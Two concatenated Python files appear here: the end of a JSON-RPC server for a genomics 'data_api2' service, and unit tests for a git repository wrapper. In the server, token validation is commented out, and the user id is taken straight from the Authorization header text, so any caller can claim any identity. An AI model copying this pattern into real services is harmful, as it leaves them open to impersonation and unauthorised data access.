self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'data_api2'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_data_api2.get_taxon,
name='data_api2.get_taxon',
types=[basestring])
self.method_authentication['data_api2.get_taxon'] = 'required'
self.rpc_service.add(impl_data_api2.get_assembly,
name='data_api2.get_assembly',
types=[basestring])
self.method_authentication['data_api2.get_assembly'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_types,
name='data_api2.get_feature_types',
types=[basestring])
self.method_authentication['data_api2.get_feature_types'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_type_descriptions,
name='data_api2.get_feature_type_descriptions',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_type_descriptions'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_type_counts,
name='data_api2.get_feature_type_counts',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_type_counts'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_ids,
name='data_api2.get_feature_ids',
types=[basestring, dict, basestring])
self.method_authentication['data_api2.get_feature_ids'] = 'required'
self.rpc_service.add(impl_data_api2.get_features,
name='data_api2.get_features',
types=[basestring, list])
self.method_authentication['data_api2.get_features'] = 'required'
self.rpc_service.add(impl_data_api2.get_proteins,
name='data_api2.get_proteins',
types=[basestring])
self.method_authentication['data_api2.get_proteins'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_locations,
name='data_api2.get_feature_locations',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_locations'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_publications,
name='data_api2.get_feature_publications',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_publications'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_dna,
name='data_api2.get_feature_dna',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_dna'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_functions,
name='data_api2.get_feature_functions',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_functions'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_aliases,
name='data_api2.get_feature_aliases',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_aliases'] = 'required'
self.rpc_service.add(impl_data_api2.get_cds_by_gene,
name='data_api2.get_cds_by_gene',
types=[basestring, list])
self.method_authentication['data_api2.get_cds_by_gene'] = 'required'
self.rpc_service.add(impl_data_api2.get_cds_by_mrna,
name='data_api2.get_cds_by_mrna',
types=[basestring, list])
self.method_authentication['data_api2.get_cds_by_mrna'] = 'required'
self.rpc_service.add(impl_data_api2.get_gene_by_cds,
name='data_api2.get_gene_by_cds',
types=[basestring, list])
self.method_authentication['data_api2.get_gene_by_cds'] = 'required'
self.rpc_service.add(impl_data_api2.get_gene_by_mrna,
name='data_api2.get_gene_by_mrna',
types=[basestring, list])
self.method_authentication['data_api2.get_gene_by_mrna'] = 'required'
self.rpc_service.add(impl_data_api2.get_mrna_by_cds,
name='data_api2.get_mrna_by_cds',
types=[basestring, list])
self.method_authentication['data_api2.get_mrna_by_cds'] = 'required'
self.rpc_service.add(impl_data_api2.get_mrna_by_gene,
name='data_api2.get_mrna_by_gene',
types=[basestring, list])
self.method_authentication['data_api2.get_mrna_by_gene'] = 'required'
self.auth_client = biokbase.nexus.Client(
config={'server': 'nexus.api.globusonline.org',
'verify_ssl': True,
'client': None,
'client_secret': None})
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]}
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
if method_name in async_run_methods:
method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1]
if method_name in async_check_methods:
method_name = async_check_methods[method_name][0] + "." + async_check_methods[method_name][1]
auth_req = self.method_authentication.get(method_name,
"none")
if auth_req != "none":
if token is None and auth_req == 'required':
err = ServerError()
err.data = "Authentication required for " + \
"data_api2 but no authentication header was passed"
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
#user, _, _ = \
# self.auth_client.validate_token(token)
list=token.split('=')
ctx['user_id'] = list[1]
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = ServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
method_name = req['method']
if method_name in async_run_methods or method_name in async_check_methods:
if method_name in async_run_methods:
orig_method_pair = async_run_methods[method_name]
else:
orig_method_pair = async_check_methods[method_name]
orig_method_name = orig_method_pair[0] + '.' + orig_method_pair[1]
if 'required' != self.method_authentication.get(orig_method_name, 'none'):
err = ServerError()
err.data = 'Async method ' + orig_method_name + ' should require ' + \
'authentication, but it has authentication level: ' + \
self.method_authentication.get(orig_method_name, 'none')
raise err
job_service_client = AsyncJobServiceClient(token = ctx['token'])
if method_name in async_run_methods:
run_job_params = {
'method': orig_method_name,
'params': req['params']}
if 'rpc_context' in ctx:
run_job_params['rpc_context'] = ctx['rpc_context']
job_id = job_service_client.run_job(run_job_params)
respond = {'version': '1.1', 'result': [job_id], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
else:
job_id = req['params'][0]
job_state = job_service_client.check_job(job_id)
finished = job_state['finished']
if finished != 0 and 'error' in job_state and job_state['error'] is not None:
err = {'error': job_state['error']}
rpc_result = self.process_error(err, ctx, req, None)
else:
respond = {'version': '1.1', 'result': [job_state], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
elif method_name in sync_methods or (method_name + '_async') not in async_run_methods:
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
else:
err = ServerError()
err.data = 'Method ' + method_name + ' cannot be run synchronously'
raise err
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception, e:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'The request method was %s\n' % environ['REQUEST_METHOD']
# print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8
# print 'The request body was: %s' % request_body
# print 'The result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
if 'error' not in error['error'] or error['error']['error'] is None:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {
'': application
}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user, _, _ = application.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception, e:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_git_repo.py
|
#!/usr/bin/env python
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
import sys
import os.path as path
import multiprocessing
from bes.testing.unit_test import unit_test
from bes.fs.file_util import file_util
from bes.fs.temp_file import temp_file
from bes.system.env_override import env_override_temp_home_func
from bes.system.execute import execute
from bes.git.git import git
from bes.git.git_repo import git_repo
from bes.git.git_status import git_status
from bes.git.git_temp_repo import git_temp_repo
from bes.git.git_unit_test import git_temp_home_func
class test_git_repo(unit_test):
def _make_repo(self, remote = True, content = None, prefix = None, commit_message = None):
return git_temp_repo(remote = remote, content = content, prefix = prefix,
debug = self.DEBUG, commit_message = commit_message)
@git_temp_home_func()
def test_init(self):
r = self._make_repo(remote = False)
self.assertEqual( [], r.status('.') )
@git_temp_home_func()
def test_exists_false(self):
tmp_dir = temp_file.make_temp_dir()
r = git_repo(tmp_dir)
self.assertFalse( r.exists() )
@git_temp_home_func()
def test_exists_true(self):
r = self._make_repo(remote = False)
self.assertTrue( r.exists() )
@git_temp_home_func()
def test_add(self):
r = self._make_repo(remote = False)
r.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r.add('.')
self.assertEqual( [
git_status(git_status.ADDED, 'a/b/c/foo.txt'),
git_status(git_status.ADDED, 'd/e/bar.txt'),
], r.status('.') )
@git_temp_home_func()
def test_commit(self):
r = self._make_repo(remote = False)
r.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r.add('.')
self.assertEqual( [
git_status(git_status.ADDED, 'a/b/c/foo.txt'),
git_status(git_status.ADDED, 'd/e/bar.txt'),
], r.status('.') )
r.commit('foo', '.')
self.assertEqual( [], r.status('.') )
@git_temp_home_func()
def test_pull(self):
r1 = self._make_repo(remote = False)
r1.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r1.add('.')
r1.commit('foo', '.')
tmp_dir = temp_file.make_temp_dir()
git.clone(r1.root, tmp_dir)
r2 = git_repo(tmp_dir)
self.assertEqual( [], r2.status('.') )
r1.write_temp_content([ 'file new/stuff.txt "some stuff" 644' ])
r1.add('new/stuff.txt')
r1.commit('foo', 'new/stuff.txt')
new_stuff_path = path.join(r2.root, 'new/stuff.txt')
self.assertFalse( path.exists(new_stuff_path) )
r2.pull()
self.assertTrue( path.exists(new_stuff_path) )
@git_temp_home_func()
def test_pull2(self):
r1 = self._make_repo(remote = False)
r1.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r1.add('.')
r1.commit('foo', '.')
tmp_dir = temp_file.make_temp_dir()
r2 = git_repo(tmp_dir, address = r1.root)
r2.clone()
r2.pull()
self.assertEqual([ self.xp_path('a/b/c/foo.txt'), self.xp_path('d/e/bar.txt') ], r2.find_all_files() )
r1.write_temp_content([
'file kiwi.txt "kiwi" 644',
])
r1.add('kiwi.txt')
r1.commit('foo', 'kiwi.txt')
r2.pull()
self.assertEqual([ self.xp_path('a/b/c/foo.txt'), self.xp_path('d/e/bar.txt'), 'kiwi.txt' ], r2.find_all_files() )
@git_temp_home_func()
def test_clone_or_pull(self):
r1 = self._make_repo(remote = False)
r1.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r1.add('.')
r1.commit('foo', '.')
tmp_dir = temp_file.make_temp_dir()
r2 = git_repo(tmp_dir, address = r1.root)
r2.clone_or_pull()
self.assertEqual([ self.xp_path('a/b/c/foo.txt'), self.xp_path('d/e/bar.txt')], r2.find_all_files() )
r1.write_temp_content([
'file kiwi.txt "kiwi" 644',
])
r1.add('kiwi.txt')
r1.commit('foo', 'kiwi.txt')
r2.pull()
self.assertEqual([ self.xp_path('a/b/c/foo.txt'), self.xp_path('d/e/bar.txt'), 'kiwi.txt' ], r2.find_all_files() )
@git_temp_home_func()
def test_find_all_files(self):
r = self._make_repo(remote = False)
self.assertEqual([], r.find_all_files() )
r.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r.add('.')
r.commit('foo', '.')
self.assertEqual([ self.xp_path('a/b/c/foo.txt'), self.xp_path('d/e/bar.txt')], r.find_all_files() )
@git_temp_home_func()
def test_push(self):
r1 = self._make_repo()
r1.write_temp_content([
'file foo.txt "this is foo" 644',
])
r1.add([ 'foo.txt' ])
r1.commit('add foo.txt', [ 'foo.txt' ])
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
self.assertEqual( 'this is foo', r2.read_file('foo.txt', codec = 'utf8') )
@git_temp_home_func()
def test_delete_remote_tags(self):
r1 = self._make_repo()
r2 = r1.make_temp_cloned_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r1.tag('1.0.0')
r1.push_tag('1.0.0')
r1.tag('1.0.1')
r1.push_tag('1.0.1')
self.assertEqual( [ '1.0.0', '1.0.1' ], r2.list_remote_tags() )
r1.delete_local_tag('1.0.1')
r1.delete_remote_tag('1.0.1')
self.assertEqual( [ '1.0.0' ], r2.list_remote_tags() )
@git_temp_home_func()
def test_list_remote_tags(self):
r1 = self._make_repo()
r2 = r1.make_temp_cloned_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r1.tag('1.0.0')
r1.push_tag('1.0.0')
r1.tag('1.0.1')
r1.push_tag('1.0.1')
self.assertEqual( [ '1.0.0', '1.0.1' ], r2.list_remote_tags() )
@git_temp_home_func()
def test_bump_tag(self):
r1 = self._make_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r1.tag('1.0.0')
r1.push_tag('1.0.0')
self.assertEqual( '1.0.0', r1.greatest_local_tag() )
r1.bump_tag('revision', reset_lower = True)
r2 = r1.make_temp_cloned_repo()
self.assertEqual( '1.0.1', r2.greatest_local_tag() )
@git_temp_home_func()
def test_bump_tag_empty(self):
r1 = self._make_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
self.assertEqual( None, r1.greatest_local_tag() )
r1.bump_tag('revision', reset_lower = True)
r2 = r1.make_temp_cloned_repo()
self.assertEqual( '1.0.0', r2.greatest_local_tag() )
@git_temp_home_func()
def test_bump_two_components(self):
r1 = self._make_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r1.tag('1.0')
r1.push_tag('1.0')
self.assertEqual( '1.0', r1.greatest_local_tag() )
r1.bump_tag('minor', reset_lower = True)
r2 = r1.make_temp_cloned_repo()
self.assertEqual( '1.1', r2.greatest_local_tag() )
@git_temp_home_func()
def test_list_local_tags_by_version(self):
r = self._make_repo(remote = False)
r.add_file('readme.txt', 'readme is good')
r.tag('1.0.0')
r.tag('1.0.1')
r.tag('1.0.4')
r.tag('1.0.5')
r.tag('1.0.9')
r.tag('1.0.11')
self.assertEqual( [ '1.0.9', '1.0.11' ], r.list_local_tags_gt('1.0.5') )
self.assertEqual( [ '1.0.5', '1.0.9', '1.0.11' ], r.list_local_tags_ge('1.0.5') )
self.assertEqual( [ '1.0.0', '1.0.1', '1.0.4' ], r.list_local_tags_lt('1.0.5') )
self.assertEqual( [ '1.0.0', '1.0.1', '1.0.4', '1.0.5' ], r.list_local_tags_le('1.0.5') )
@git_temp_home_func()
def test_list_remote_tags_by_version(self):
r1 = self._make_repo()
r2 = r1.make_temp_cloned_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
all_tags = [ '1.0.0', '1.0.1','1.0.4','1.0.5','1.0.9','1.0.11' ]
for tag in all_tags:
r1.tag(tag)
r1.push_tag(tag)
self.assertEqual( all_tags, r2.list_remote_tags() )
self.assertEqual( [ '1.0.9', '1.0.11' ], r2.list_remote_tags_gt('1.0.5') )
self.assertEqual( [ '1.0.5', '1.0.9', '1.0.11' ], r2.list_remote_tags_ge('1.0.5') )
self.assertEqual( [ '1.0.0', '1.0.1', '1.0.4' ], r2.list_remote_tags_lt('1.0.5') )
self.assertEqual( [ '1.0.0', '1.0.1', '1.0.4', '1.0.5' ], r2.list_remote_tags_le('1.0.5') )
@git_temp_home_func()
def test_save_file_first_time(self):
r1 = self._make_repo()
r2 = r1.make_temp_cloned_repo()
r1.save_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2.pull()
self.assertEqual( 'readme is good', r2.read_file('readme.txt') )
@git_temp_home_func()
def test_save_file_modify(self):
r1 = self._make_repo()
r2 = r1.make_temp_cloned_repo()
r1.add_file('readme.txt', 'readme is good')
# r1.save_file('readme.txt', 'readme is bad')
# r1.push('origin', 'master')
# r2.pull()
# self.assertEqual( 'readme is bad', r2.read_file('readme.txt') )
@git_temp_home_func()
def xtest_reset_to_revision(self):
r1 = self._make_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
r3 = r1.make_temp_cloned_repo()
r2.pull()
r3.pull()
r2.save_file('readme.txt', 'readme 2')
r2.push()
r3.save_file('readme.txt', 'conflicted 1')
with self.assertRaises(RuntimeError) as ctx:
r3.push()
r3.reset_to_revision('@{u}')
r3.pull()
r3.save_file('readme.txt', 'conflicted 1')
r3.push()
@git_temp_home_func()
def test_list_branches_just_master(self):
r1 = self._make_repo()
commit = r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
self.assertEqual( [
( 'master', 'both', True, 0, 0, commit, 'unittest', 'add readme.txt' ),
], r2.list_branches('both') )
@git_temp_home_func()
def test_list_branches_create_inactive(self):
r1 = self._make_repo()
commit = r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
r2.branch_create('b1', checkout = False)
self.assertEqual( [
( 'b1', 'local', False, 0, 0, commit, 'unittest', 'add readme.txt' ),
( 'master', 'both', True, 0, 0, commit, 'unittest', 'add readme.txt' ),
], r2.list_branches('both') )
@git_temp_home_func()
def test_list_branches_create_active(self):
r1 = self._make_repo()
commit = r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
r2.branch_create('b1', checkout = True)
self.assertEqual( [
( 'b1', 'local', True, 0, 0, commit, 'unittest', 'add readme.txt' ),
( 'master', 'both', False, 0, 0, commit, 'unittest', 'add readme.txt' ),
], r2.list_branches('both') )
@git_temp_home_func()
def test_list_branches_create_push(self):
r1 = self._make_repo()
commit = r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
r2.branch_create('b1', checkout = True, push = True)
self.assertEqual( [
( 'b1', 'both', True, 0, 0, commit, 'unittest', 'add readme.txt' ),
( 'master', 'both', False, 0, 0, commit, 'unittest', 'add readme.txt' ),
], r2.list_branches('both') )
@git_temp_home_func()
def test_branch_status(self):
r1 = self._make_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
r3 = r1.make_temp_cloned_repo()
self.assertEqual( ( 0, 0 ), r2.branch_status() )
r2.add_file('foo.txt', 'foo.txt')
self.assertEqual( ( 1, 0 ), r2.branch_status() )
r2.add_file('bar.txt', 'bar.txt')
self.assertEqual( ( 0, 0 ), r3.branch_status() )
r2.push()
r3.fetch()
self.assertEqual( ( 0, 2 ), r3.branch_status() )
@git_temp_home_func()
def test_add_file_with_commit(self):
r1 = self._make_repo(content = [ 'file readme.txt "readme is good" 644' ])
r2 = r1.make_temp_cloned_repo()
self.assertEqual( [ 'readme.txt' ], r2.find_all_files() )
commit1 = r1.last_commit_hash()
r1.add_file('orange.txt', 'orange is good', commit = True)
commit2 = r1.last_commit_hash()
self.assertNotEqual( commit1, commit2 )
r1.push()
r2.pull()
self.assertEqual( [ 'orange.txt', 'readme.txt' ], r2.find_all_files() )
@git_temp_home_func()
def test_add_file_with_no_commit(self):
r1 = self._make_repo(content = [ 'file readme.txt "readme is good" 644' ])
r2 = r1.make_temp_cloned_repo()
self.assertEqual( [ 'readme.txt' ], r2.find_all_files() )
commit1 = r1.last_commit_hash()
r1.add_file('orange.txt', 'orange is good', commit = False)
commit2 = r1.last_commit_hash()
self.assertEqual( commit1, commit2 )
r1.push()
r2.pull()
self.assertEqual( [ 'readme.txt' ], r2.find_all_files() )
@git_temp_home_func()
def test_files_for_commit(self):
r1 = self._make_repo(content = [ 'file readme.txt "readme is good" 644' ], prefix = 'r1-')
r1.add_file('orange.txt', 'orange is good', commit = False)
r1.add_file('kiwi.txt', 'kiwi is good', commit = False)
r1.add([ 'orange.txt', 'kiwi.txt' ])
r1.commit('add stuff', [ 'orange.txt', 'kiwi.txt' ])
r1.push()
r2 = r1.make_temp_cloned_repo(prefix = 'r2-')
self.assertEqual( [ 'kiwi.txt', 'orange.txt' ], r2.files_for_commit(r2.last_commit_hash()) )
@git_temp_home_func()
def test_active_branch(self):
r1 = self._make_repo(content = [ 'file readme.txt "readme is good" 644' ], prefix = 'r1-')
r1.branch_create('b1', checkout = False, push = True)
r2 = r1.make_temp_cloned_repo(prefix = 'r2-')
self.assertEqual( 'master', r2.active_branch() )
r2.checkout('b1')
self.assertEqual( 'b1', r2.active_branch() )
r2.checkout('master')
self.assertEqual( 'master', r2.active_branch() )
@git_temp_home_func()
def test_remove(self):
r = self._make_repo(remote = True)
r.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r.add('.')
r.commit('add', '.')
r.remove('d/e/bar.txt')
r.commit('remove', 'd/e/bar.txt')
r.push()
@git_temp_home_func()
def test_has_unpushed_commits(self):
r = self._make_repo(remote = True)
r.write_temp_content([
'file foo.txt "this is foo" 644',
])
r.add([ 'foo.txt' ])
r.commit('add foo.txt', [ 'foo.txt' ])
r.push('origin', 'master')
self.assertFalse( r.has_unpushed_commits() )
r.add_file('bar.txt', 'this is bar.txt', commit = True)
self.assertTrue( r.has_unpushed_commits() )
@git_temp_home_func()
def test_has_local_tag(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
r.tag('foo-1.0.0', push = False)
self.assertTrue( r.has_local_tag('foo-1.0.0') )
self.assertFalse( r.has_remote_tag('foo-1.0.0') )
@git_temp_home_func()
def test_has_remote_tag(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
r.tag('foo-1.0.0', push = False)
self.assertTrue( r.has_local_tag('foo-1.0.0') )
self.assertFalse( r.has_remote_tag('foo-1.0.0') )
r.push_tag('foo-1.0.0')
self.assertTrue( r.has_remote_tag('foo-1.0.0') )
@git_temp_home_func()
def test_has_commit_exists(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
commit1 = r.add_file('bar.txt', 'this is bar.txt')
commit2 = r.add_file('baz.txt', 'this is baz.txt')
self.assertTrue( r.has_commit(commit1) )
self.assertTrue( r.has_commit(commit2) )
@git_temp_home_func()
def test_has_commit_does_not_exist(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
commit1 = r.add_file('bar.txt', 'this is bar.txt')
commit2 = r.add_file('baz.txt', 'this is baz.txt')
self.assertFalse( r.has_commit('0000000') )
@git_temp_home_func()
def test_has_commit_invalid_hash(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
commit1 = r.add_file('bar.txt', 'this is bar.txt')
commit2 = r.add_file('baz.txt', 'this is baz.txt')
self.assertFalse( r.has_commit('invalidhash') )
@git_temp_home_func()
def test_has_revision(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
commit1 = r.add_file('bar.txt', 'this is bar.txt')
r.tag('foo-1.0.0', push = False)
commit2 = r.add_file('baz.txt', 'this is baz.txt')
r.tag('foo-1.0.1', push = False)
self.assertFalse( r.has_revision('0000000') )
self.assertTrue( r.has_revision(commit1) )
self.assertTrue( r.has_revision(commit2) )
self.assertTrue( r.has_revision('foo-1.0.0') )
self.assertTrue( r.has_revision('foo-1.0.1') )
self.assertFalse( r.has_revision('foo-1.0.2') )
@git_temp_home_func()
def test_submodule_set_branch(self):
sub_content = [
'file subfoo.txt "this is subfoo" 644',
]
sub_repo = self._make_repo(remote = True, content = sub_content)
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
r.call_git('submodule add {} mod'.format(sub_repo.address))
self.assertEqual( None, r.submodule_get_branch('mod') )
r.submodule_set_branch('mod', 'foo')
self.assertEqual( 'foo', r.submodule_get_branch('mod') )
@git_temp_home_func()
def test_submodule_init(self):
sub_content = [
'file subfoo.txt "this is subfoo" 644',
]
sub_repo = self._make_repo(remote = True, content = sub_content, prefix = '-mod-')
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, prefix = '-main-')
self.assertEqual( [ 'foo.txt' ], r.find_all_files() )
r.submodule_add(sub_repo.address, 'mod')
r.commit('add mod submodule', '.')
r.push()
self.assertEqual( [ 'foo.txt', 'mod/subfoo.txt' ], r.find_all_files() )
r2 = git_repo(self.make_temp_dir(), address = r.address)
r2.clone()
self.assertEqual( ( 'mod', None, sub_repo.last_commit_hash(), sub_repo.last_commit_hash(short_hash = True), False, None ),
r2.submodule_status_one('mod') )
self.assertEqual( [ 'foo.txt' ], r2.find_all_files() )
